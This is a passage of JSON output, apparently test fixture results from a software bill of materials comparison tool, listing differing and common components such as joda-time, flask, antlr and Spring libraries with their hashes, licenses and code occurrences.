{"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false}], "specVersion": "1.5", "version": 2}, "result_2": {"diff_summary": {"bom_1.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}, "bom_2.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.8.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.8.9?type=jar", "scope": "required", "version": "2.8.9"}]}}}, "common_summary": {"components": {"frameworks": [{"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "group": "org.springframework.cloud", "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}]}}}, "result_3": {"diff_summary": {"bom_1.json": {"components": {"applications": [{"bom-ref": "pkg:github/actions/setup-python@v2", "type": "application", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "version": "v2"}], "frameworks": [{"bom-ref": "pkg:pypi/flask@1.1.2", "type": "framework", "name": "flask", "purl": "pkg:pypi/flask@1.1.2", "version": "1.1.2"}]}}, "bom_2.json": {"components": {"applications": [{"bom-ref": "pkg:github/actions/setup-python@v2", "type": "application", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "version": "v2"}], "frameworks": [{"bom-ref": "pkg:pypi/flask@1.1.0", "type": "framework", "name": "flask", "purl": "pkg:pypi/flask@1.1.0", "version": "1.1.0"}]}}}, "common_summary": {"components": {"libraries": [{"bom-ref": "pkg:pypi/werkzeug@1.0.1", "type": "library", "name": "Werkzeug", "purl": "pkg:pypi/werkzeug@1.0.1", "version": "1.0.1"}], "applications": [{"bom-ref": "pkg:github/actions/checkout@v2", "type": "application", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "version": "v2"}]}}}, "result_4": {"diff_summary": {"test/sbom-java.json": {"components": {"frameworks": [{"bom-ref": "pkg:maven/antlr/antlr@2.7.7?type=jar", "type": "framework", "description": "A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\antlr\\antlr\\2.7.7\\antlr-2.7.7.jar"}]}}, "group": "antlr", "hashes": [{"alg": "SHA-384", "content": "2e811e531ce30a2a905d093a00de596cf04406413b60422db8252b46125cadf07b71459cf6ac6da575ec030a9bf05e57"}, {"alg": "SHA-512", "content": "311c3115f9f6651d1711c52d1739e25a70f25456cacb9a2cdde7627498c30b13d721133cc75b39462ad18812a82472ef1b3b9d64fab5abb0377c12bf82043a74"}, {"alg": "SHA3-512", "content": "3a8ce565280a157dd6e08fb68c317a4c28616099c56bc4992c38cf74a10a54a89e18e7c45190ce8511360798a87adc92f432382f9d9bdde0d56664b50044b517"}, {"alg": "SHA-1", "content": "83cd2cd674a217ade95a4bb83a8a14f351f48bd0"}, {"alg": "SHA-256", "content": "88fbda4b912596b9f56e8e12e580cc954bacfb51776ecfddd3e18fc1cf56dc4c"}, {"alg": "SHA3-256", "content": "babce5c8beb1d5907a7ed6354589e991da7d8d5cbd86c479abfa1e1dfc4d2eb8"}, {"alg": "SHA3-384", "content": "bdf019332ae8714ef6a3904bb42bb08c1fe4feacf5e6137274884b0377d4e5b5f7aa9fe8e1ef5ca9b3e15f12320fdb67"}, {"alg": "MD5", "content": "f8f1352c52a4c6a500b597596501fc64"}], "licenses": [{"license": {"id": "BSD-3-Clause"}}], "name": "antlr", "purl": "pkg:maven/antlr/antlr@2.7.7?type=jar", "scope": "required", "version": "2.7.7"}, {"bom-ref": "pkg:maven/org.antlr/antlr-runtime@3.4?type=jar", "type": "framework", "description": "A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\antlr\\antlr-runtime\\3.4\\antlr-runtime-3.4.jar"}]}}, "group": "org.antlr", "hashes": [{"alg": "MD5", "content": "0e0318be407e51fdf7ba6777eabfdf73"}, {"alg": "SHA3-512", "content": "13d1f73c44e807b36946c21cfd506e91e8cbdf685b770cbc0dcb4e55ec28b5bc91bd90eb7f24ebfd13386a47eccf552dd2a1ab277fccabafdb7a9b40aa9d4fc5"}, {"alg": "SHA-512", "content": "1786aff2df4664483adcb319e64be7b69b643ac9508c3f11796b5aa45b9072b46f53f0a21b2ff7291162afe81506de16161746273e4532ebad75adbd81203f0d"}, {"alg": "SHA3-256", "content": "3f6cf631e9f792a41128400f8690266d915c0588ef85073a6cae73624a155b10"}, {"alg": "SHA-256", "content": "5b7cf53b7b30b034023f58030c8147c433f2bee0fe7dec8fae6bebf3708c5a63"}, {"alg": "SHA-384", "content": "6ee2dcd3cf8366fe6ee18fb87aebe2d162b232c89e0aab417f97fed368cdf652d27db518dc5e71aa2a4aadda2e7f4c7a"}, {"alg": "SHA-1", "content": "8f011408269a8e42b8548687e137d8eeb56df4b4"}, {"alg": "SHA3-384", "content": "db284c93203cbbec1b22b482a45c70c68e858a90e73b23fae66c1bc53231b0f61c5576fcf51ea0d3a30070428d7dd865"}], "name": "antlr-runtime", "purl": "pkg:maven/org.antlr/antlr-runtime@3.4?type=jar", "scope": "required", "version": "3.4"}, {"bom-ref": "pkg:maven/org.apache.commons/commons-math@2.2?type=jar", "type": "framework", "description": "The Math project is a library of lightweight, self-contained mathematics and statistics components addressing the most common practical problems not immediately available in the Java programming language or commons-lang.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\apache\\commons\\commons-math\\2.2\\commons-math-2.2.jar"}]}}, "group": "org.apache.commons", "hashes": [{"alg": "SHA-256", "content": "15993bb2a3cf50f3291b40fc980a3166a0984e7b5f1abbe5232151fd94954584"}, {"alg": "SHA-1", "content": "4877b85d388275f994a5cfc7eceb73a8045d3006"}, {"alg": "MD5", "content": "4b65633769a2d3c532c86188648bb380"}, {"alg": "SHA-384", "content": "56dde9ba9689a3efae9165010b08469108f4971542809b52facc348a841dbed76d83b5fe218ca24db6d8276f45e39458"}, {"alg": "SHA3-512", "content": "67bcc94b3d2ebf1e8d9862ad5c57609e6315e53fb27f9db16be4e1384a6619aee9e7f2d2ef530380e107d9c337cbcd4bb3a21ff4293931cb9bb488f598c63b5c"}, {"alg": "SHA3-384", "content": "7d71fdb235d8d8c4019164315b6241e893215ee3ed4934a15ccc71bae9154726e8e9ec1ab76daf0e8dec62d0069e806d"}, {"alg": "SHA3-256", "content": "d00d7bef766c466c34e0f624a1ba6ea6a2c1a0a46de81f85e331548d13b5cef0"}, {"alg": "SHA-512", "content": "f444ead8d025d92ebacc05a366cdfd6f3c9b9788f36961cc66a4c71846b9e953a586268c23268a7a8b9561159fc38f7478daea8142b3b55fb3a8dea756720ab6"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "commons-math", "publisher": "The Apache Software Foundation", "purl": "pkg:maven/org.apache.commons/commons-math@2.2?type=jar", "scope": "required", "version": "2.2"}, {"bom-ref": "pkg:maven/org.bouncycastle/bcprov-jdk15on@1.56?type=jar", "type": "framework", "description": "The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms. This jar contains JCE provider and lightweight API for the Bouncy Castle Cryptography APIs for JDK 1.5 to JDK 1.8.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\bouncycastle\\bcprov-jdk15on\\1.56\\bcprov-jdk15on-1.56.jar"}]}}, "group": "org.bouncycastle", "hashes": [{"alg": "SHA3-512", "content": "24ea4d76cc78baecafd8baeae0e201201463d920c102fe20f8dd29ff307785194dc27323215dd24680b77bbb1e65841f8150f047a3b8f007c9b04f4860b4a181"}, {"alg": "MD5", "content": "3c1bc7aaf3449308e34296546078d9f7"}, {"alg": "SHA-512", "content": "47e5f73d2b66891cf21412b807481fff4b1a844ff247ba170e7bab25a7f6303cbd5ada22e7382ba20ee344d8cc3a1909a3d255f4b24defe9357523b4a122db68"}, {"alg": "SHA-256", "content": "963e1ee14f808ffb99897d848ddcdb28fa91ddda867eb18d303e82728f878349"}, {"alg": "SHA-1", "content": "a153c6f9744a3e9dd6feab5e210e1c9861362ec7"}, {"alg": "SHA3-256", "content": "ab4e77030ace3c79f45602cf94baf81ae18305ae83037c5a37077a752cb5bfab"}, {"alg": "SHA-384", "content": "c9de4efe55d8737d5c84e7253cabe2de7b7d72180ef4c0a645ede19f627d3ebce7c0c4f19e51412b7e0a16d6c6255d32"}, {"alg": "SHA3-384", "content": "ef69f74fbf1f5416c90038f07aad6aa83e60932cf8a31400554e0380c134921ed8638528b4339edd5e8b7d1df4f62a3f"}], "licenses": [{"license": {"name": "Bouncy Castle Licence", "url": "http://www.bouncycastle.org/licence.html"}}], "name": "bcprov-jdk15on", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on@1.56?type=jar", "scope": "required", "version": "1.56"}, {"bom-ref": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "type": "framework", "description": "Spring Boot AutoConfigure", "evidence": {"callstack": {"frames": [{"fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 21, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 48, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 70, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 70, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 65, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "<init>", "line": 46, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"column": 19, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "<init>", "line": 48, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"column": 3, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "<init>", "line": 48, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "<init>", "line": 46}, {"fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 9, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}]}, "identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\boot\\spring-boot-autoconfigure\\2.0.3.RELEASE\\spring-boot-autoconfigure-2.0.3.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\AccountApplication.java#11"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\AuthApplication.java#9"}, {"location": "config\\src\\main\\java\\com\\piggymetrics\\config\\ConfigApplication.java#7"}, {"location": "gateway\\src\\main\\java\\com\\piggymetrics\\gateway\\GatewayApplication.java#8"}, {"location": "monitoring\\src\\main\\java\\com\\piggymetrics\\monitoring\\MonitoringApplication.java#7"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\NotificationServiceApplication.java#18"}, {"location": "registry\\src\\main\\java\\com\\piggymetrics\\registry\\RegistryApplication.java#7"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\StatisticsApplication.java#21"}, {"location": "turbine-stream-service\\src\\main\\java\\com\\piggymetrics\\turbine\\TurbineStreamServiceApplication.java#8"}]}, "group": "org.springframework.boot", "hashes": [{"alg": "SHA-1", "content": "011bc4cc96b08fabad2b3186755818fa0b32d83f"}, {"alg": "MD5", "content": "0a52980d8c71d372ee9c6b100da7f49b"}, {"alg": "SHA3-384", "content": "5bfb3d163cfaaa467d760860d0c0e3825c1bccf2b62626822eb0eaa272bec13798b09b4137b109c58836c3d7566af73d"}, {"alg": "SHA-256", "content": "742df8010f51ac98a14ff19fbd6df1ef0aca7656ad475295fa90444389d2d9d4"}, {"alg": "SHA3-256", "content": "7d51c2f934ca270814c03cb35422d183a5fd16cce3b7a707047f7e1ae610b099"}, {"alg": "SHA-512", "content": "c2918394ff63ad616f64fd2900cc1c688f8772cf05a3f206d2521e2ab525bda29f6e87b18ca7ae4c4c6cd4a248032d51cc0a0d4806370166efbabc77173caac2"}, {"alg": "SHA-384", "content": "cad79a4a727581de121cc68864c456863f396e85adc7b1514bae5f874b5a50ce134ce7723c1697e297d4c61b29dcbd5c"}, {"alg": "SHA3-512", "content": "e057673f1fe4b86b0b3bd60d2feeef09549bd373cfd56e8d8a88b13272f8824b87bc8cfd02fb9739b1456ffa82567e1e99ca3cf6d5c1b7954cd0a0aa8f4d4299"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-boot-autoconfigure", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "scope": "required", "version": "2.0.3.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.boot/spring-boot-starter-aop@2.0.3.RELEASE?type=jar", "type": "framework", "description": "Starter for aspect-oriented programming with Spring AOP and AspectJ", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\boot\\spring-boot-starter-aop\\2.0.3.RELEASE\\spring-boot-starter-aop-2.0.3.RELEASE.jar"}]}}, "group": "org.springframework.boot", "hashes": [{"alg": "SHA3-384", "content": "040f344c92763062c6fa2a6de1de4b07d4156db2e6a1b10189af28887a5dcd70a6b8eb505f953910310baaf42c9a06c1"}, {"alg": "SHA3-256", "content": "0b2ef68be5c3f07c5a385ca24cbf50cacffe25f38eb440df5bb2ea9e79d10ff3"}, {"alg": "MD5", "content": "0c857777c2044cd2ececee6b70c1cef5"}, {"alg": "SHA-512", "content": "329768326aa539dbdfda2d7eb79798deccc00948c05a6029159e25058832374789465df103da18fc88a949a08d0c439dde93b7383237106b7b92aac742f2a674"}, {"alg": "SHA-1", "content": "a78c7bc25fd51b217f078421dc40d13ddc3b9f8f"}, {"alg": "SHA-384", "content": "c6cd2c55f39efda38caf74099d2340b02d853c47cf688d66ca8fbcdbd674b1a9725d5553899f2c0ab5c65f5f11c41f10"}, {"alg": "SHA-256", "content": "ddfc437ff26e206e74d8d2b949a978dc39a5bfdade596ab280a9d56efff2d5b1"}, {"alg": "SHA3-512", "content": "ef3aecc2f2545c8224dff5e7dec998b3a2d94c6bb6296b08cf732f8488336431cd152cc15007ddb062cff00e465d9b288205dcbace1bab3859f069748d597674"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-boot-starter-aop", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.boot/spring-boot-starter-aop@2.0.3.RELEASE?type=jar", "scope": "required", "version": "2.0.3.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "This project is a Spring configuration client.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-config-client\\2.0.0.RELEASE\\spring-cloud-config-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-384", "content": "15b9e5813ca5260a888248932b83b3e63cd27bf46ac5db0091718c7c6e91e5d78d7889da0b1fdbaaa12de74e0fdedc49"}, {"alg": "SHA3-256", "content": "263ebd750a961f58776b4cf085feb28381530eace5b8c75d9011eeb19a2bb98d"}, {"alg": "SHA3-512", "content": "3d3fd94e8f281be0c4d8059dfd199ac117afba71bbd777c412f7ec7c2937a2e0caa9f01197948f9df1ebb854e0082c7dc3881bf0b7f599607444c3d4bd3016dd"}, {"alg": "SHA3-384", "content": "48ae1e40ca060c109ce89ae48eba68bb348f05aaab6f074aec8c969b66e7b3a811e8bc6e8901c183c14085612bb01dfa"}, {"alg": "MD5", "content": "5f479b27ddaa0d47f0cc6e150ac05c33"}, {"alg": "SHA-1", "content": "7a3f4447664c61ff674c29a9b2ff0dc988dee316"}, {"alg": "SHA-256", "content": "a4c26aaa864418c008b3fb067ad3b54da9a968921db4bab47366b97bd8f8ca30"}, {"alg": "SHA-512", "content": "b545b2744f31d5cc8fd7cf89e42bf7dc1a4464d1761d28f48f7446906c6bd43ec2a696eac0ba2708723ebee36b1f6316f37972e24b76eb1a621f0f153779d4ea"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-config-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-core@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Netflix Core", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-netflix-core\\2.0.0.RELEASE\\spring-cloud-netflix-core-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "MD5", "content": "2070a3bc6e5b770d52cdd65858ddda07"}, {"alg": "SHA3-384", "content": "77e17180e15dca51e4f3d69ff91cc90467f772d014c7a826595b5e1892a0f57bc4b4e037a59495558fefa71764fd5993"}, {"alg": "SHA-512", "content": "7814ad392c384ba4186f164e8b663e600a90c577de54ac89b967126cfe462ce08a2f295f7e54f94db3902f49de8838c70faec413d78a2d23a339a609cadcd41c"}, {"alg": "SHA-1", "content": "796bf4e966fac782c2118396d5504e01d5bd3115"}, {"alg": "SHA-256", "content": "8651ad06e6c91fadd5bf77fba528b9a23a66fb3b57b495ea8da20def6f3b5f6e"}, {"alg": "SHA-384", "content": "accd2bb47510f90c7df339cca211b5bf66321df9fdd5a157ed23adc012cd1f914cd94c4174cacb3e641b748ea4275e25"}, {"alg": "SHA3-256", "content": "cb9798a3a5fdf0b1c3233f60f16e9f9ee74e4d451318fb905221ee652828dfff"}, {"alg": "SHA3-512", "content": "e3f2ef307447c7e5cb994da1ca5c3ca390971a7d6062dbdf11f53cf28fe65eb5e1df31ec38474ab4e0feb2dddbc4b519a4984e5509212b5d79906eaaebed3f78"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-netflix-core", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-core@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-eureka-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Netflix Eureka Client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-netflix-eureka-client\\2.0.0.RELEASE\\spring-cloud-netflix-eureka-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-384", "content": "237201a38459c81ecedba61d4d59a522cbea01b65297c1f068e11294dbc9da626035815b1846f08c1737058e33f021e9"}, {"alg": "SHA-256", "content": "7ff7145adc938be815a8055af0cdea0f720c6b356b57ac2136e53bcd5d25e97f"}, {"alg": "SHA-512", "content": "8a3f0018f3bdc5bb1ad4e246526cbdb422202d2b699c3a0cac0a765dd1d865f87b778a702f96ff2ad7b8ac6197afa46b6a6555c694ad57e0d3ce8608d071da73"}, {"alg": "MD5", "content": "8b93d4d30de32748b186aeacfa618f67"}, {"alg": "SHA3-256", "content": "cad94fdc93582973a4376fd3c4ee59ee34855af8f125db916de6e9b1a4b47793"}, {"alg": "SHA-384", "content": "dd690fb96277a00f46f6f81f53204d831853065abfc1bd57e61872b2c4c6858d26cd4be36d88cda8bd05e6e162c14299"}, {"alg": "SHA-1", "content": "e00b09813d5d3714dbbc150b91553267124e2250"}, {"alg": "SHA3-512", "content": "fcca16621c429111e17349f412e5f630df3aaed591e8c67457902512f293dbd890c40bd481660e1f95ab4ee3674450e37bf1291afad0e7d8f540c61c267217b4"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-netflix-eureka-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-eureka-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter Netflix Eureka Client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter-netflix-eureka-client\\2.0.0.RELEASE\\spring-cloud-starter-netflix-eureka-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-256", "content": "2d792b6b575950436fe620ac173535a7fa0b7deccf290cbeb37ae7a21b6f6416"}, {"alg": "SHA-512", "content": "2e512df35dff02c0814d1a59a7ba7dbf8a4280c1658565c115f5a599f80401df9d5da043b3c0868230b79ba7c04ec53138f98aeede29fd703ae2ea25d7f357b4"}, {"alg": "SHA3-384", "content": "3a5cd5b3839f0fc79088457664f01597a6f948aa76efda13886f9144fa826b801ecf9b4d2b8135dd2d7d139fb985cacc"}, {"alg": "SHA3-512", "content": "3aa2f65011ba5f3923f0925d1b85180528ab5c57293353b3022ed8e3f90798a77cf13eae4beaea7d54eb60049a4776f5d9c994d56727c8bd7f8e4b9b39aa9d98"}, {"alg": "SHA-256", "content": "4686ea441f3b924e7f1631d49a6fb89a771a778fc7fd32612163d3c60ec21d14"}, {"alg": "MD5", "content": "46d482bf052f34fc1fde298864af2215"}, {"alg": "SHA-1", "content": "4e241e6685a4dfc45987945df6c2477503ae20d7"}, {"alg": "SHA-384", "content": "fe253756cdd8724e26477c505988966012a1e103b07e2f404967ed6760f0cb934d288c5aef8883f462e19a2fe9ea9841"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-starter-netflix-eureka-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring AOP", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-aop\\5.0.7.RELEASE\\spring-aop-5.0.7.RELEASE.jar"}]}}, "group": "org.springframework", "hashes": [{"alg": "SHA-512", "content": "24ba927d8ea0ca58a8a6722fe99ed165b7174926a3f2ac731eaa8383e7f6b9f74caf7ae39562ef9ee324914ccf8ad5b6b7270bfc688a461c6feed089e778dffb"}, {"alg": "SHA-256", "content": "2de906598bfb44d3e6833c36e1ad9c565275af16da25e13e6f676126f613908c"}, {"alg": "SHA3-256", "content": "3f0c5849b9b772b3544611b78300843d6751fac5bf80dbec44a07d0fb95bb75c"}, {"alg": "SHA-384", "content": "67209dd624bfaa95f376772e89f0e574b971d9224a2c5ca91645a9a00b3e25ab8c4594e96ac7de09c2ac111767ec39ad"}, {"alg": "MD5", "content": "cd592093caba2866661a095786f1ed11"}, {"alg": "SHA3-512", "content": "e3871a6dea5b1a64cc8fba9b05a48a83b3924190f9eab5d576583ec9060cbf1982133f845360f0aa2f05cd9dab6b00a6e5f5dff5d8a33914848fff9bfe0f63d4"}, {"alg": "SHA3-384", "content": "e5a7367855624bc08bbf442cece3b894a285068b7a328e3451818fda2d9a148678c736a18d98eef1a6490587329015f2"}, {"alg": "SHA-1", "content": "fdd0b6aa3c9c7a188c3bfbf6dfd8d40e843be9ef"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-aop", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring Beans", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-beans\\5.0.7.RELEASE\\spring-beans-5.0.7.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\config\\ResourceServerConfig.java#28"}]}, "group": "org.springframework", "hashes": [{"alg": "SHA-256", "content": "0d0adc1832406304985a72d2c79c6d0af481f34ae2a9c4a3835c9b0968da25e3"}, {"alg": "SHA-512", "content": "58b8e141981594d43cc52fd179f512a1919eaa4ddd323127302fd753b5befb1b5ee8fc3b70adf4963bdaa181ac3ff67ed643bdacdde2881c26f12f55d3c34190"}, {"alg": "SHA3-256", "content": "72ae91c81771a542fb4ce30b45608b43dcfe03d9e18070763e7421fa0389d52c"}, {"alg": "SHA-1", "content": "c1196cb3e56da83e3c3a02ef323699f4b05feedc"}, {"alg": "MD5", "content": "c850badbb984cda6983da22c8672a59f"}, {"alg": "SHA-384", "content": "d2aaea6cd85065710cdc27d25dfd7bdfdea57f0f796214767e83f09b967c6cb2c954369a40e2e6f55f4106b43d099558"}, {"alg": "SHA3-512", "content": "ecb8c1471d73b885db4b4796a95a1af1e229f33724f2d3cbdf8df947f84fd1dcc6064a8ef2552189304df475283c9c899d4bcb3bdf3a0f97390aed50d0f8815b"}, {"alg": "SHA3-384", "content": "f35b746798ceaad156b257f6c208cc3e9783244d68501187af355a98613c048b62cee350b728c67fc067ddca41fabbe1"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-beans", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-web@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring Web", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-web\\5.0.7.RELEASE\\spring-web-5.0.7.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\client\\AuthServiceClient.java#12"}, {"location": 